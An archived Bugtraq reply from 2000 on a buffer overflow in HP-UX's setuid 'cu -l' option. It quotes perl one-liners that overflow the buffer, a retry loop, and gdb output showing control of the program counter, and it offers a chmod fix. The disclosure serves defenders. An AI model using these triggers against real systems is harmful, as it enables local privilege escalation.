[17558] in bugtraq
Re: HPUX cu -l option buffer overflow vulnerabilit
daemon@ATHENA.MIT.EDU (J.A. Gutierrez)
Wed Nov 8 14:52:35 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <200011080913.LAA06369@gtc1.cps.unizar.es>
Date: Wed, 8 Nov 2000 11:13:42 +0200
Reply-To: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200011021343.eA2DhRU20236@tbird.iworld.com> from "zorgon" at Nov
2, 0 08:43:27 am
>
> =======================================================
> HPUX cu -l option buffer overflow vulnerability
> =======================================================
>
> Date: 02/11/2000
> Tested on HP-UX B.11.00
>
> $ cu -l `perl -e 'printf "A" x 9777'`
>
It's exploitable on 10.20 (trivial exploit: you don't even
have to find return address, the buffer itself gets executed)
HP-UX 9.x 68k seems to be vulnerable too, but I don't have
the exploit.
On HP-UX 11 you need PA-RISC 1.1 shell code, and the PC
you get with
./cu -l `perl -e 'printf "A" x 5667'`
changes randomly (why?). Eventually you get a pointer to your
data:
$ while :
do
./cu -l `perl -e 'printf "A" x 5667'`
if file core | egrep -v SIGILL
then
break
fi
done
[...]
Illegal instruction(coredump)
Connect failed: Requested device/system name not known
Illegal instruction(coredump)
Memory fault(coredump)
core: core file from 'cu' - received SIGSEGV
$ gdb cu core
[...]
Core was generated by `cu'.
Program terminated with signal 11, Segmentation fault.
Unable to find __dld_flags symbol in object file.
#0 0x7f7eb010 in ?? ()
#0 0x7f7eb010 in ?? ()
(gdb) print {char *} 0x7f7eb010
$1 = 0x41414141 <Address 0x41414141 out of bounds>
(gdb)
Fix: chmod -s /bin/cu
--
finger spd@gtc1.cps.unizar.es for PGP / So be easy and free
.mailcap tip of the day: / when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null / (the pogues)
